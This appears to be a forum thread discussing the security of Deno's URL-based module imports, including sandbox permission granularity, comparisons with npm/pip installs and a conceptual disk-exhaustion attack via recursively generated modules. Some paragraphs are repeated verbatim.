It's not just about the integrity. The url may very well provide what they claim to provide, so checksums would match, but it's the direct downloading and running of remote code that is terrifying.
This is pretty much like all the bash one-liners piping and executing a curl/wget download. I understand there are sandbox restrictions, but are the restrictions on a per dependency level, or on a program level?
If they are on a program level, they are essentially useless, since the first thing I'm going to do is break out of the sandbox to let my program do whatever it needs to do (read fs/network etc.). If it is on a per dependency level, then am I really expected to manage sandbox permissions for all of my projects dependencies?
If you afraid of "direct" downloading and executing some of that code, then what do you think happen when you npm install/pip install a package?
I'm very interested if you can expose a new attack vector that didn't exist with the previous solutions.
You can generate modules on the fly on the server, that require next generated module recursively blowing up your disk space. If deno stores those files uncompressed, you can generate module full of comments/zeros so it compresses very well for attacker and eats a lot of space on consumer side.
This is pretty much like all the bash one-liners piping and executing a curl/wget download. I understand there are sandbox restrictions, but are the restrictions on a per dependency level, or on a program level?
If they are on a program level, they are essentially useless, since the first thing I'm going to do is break out of the sandbox to let my program do whatever it needs to do (read fs/network etc.). If it is on a per dependency level, then am I really expected to manage sandbox permissions for all of my projects dependencies?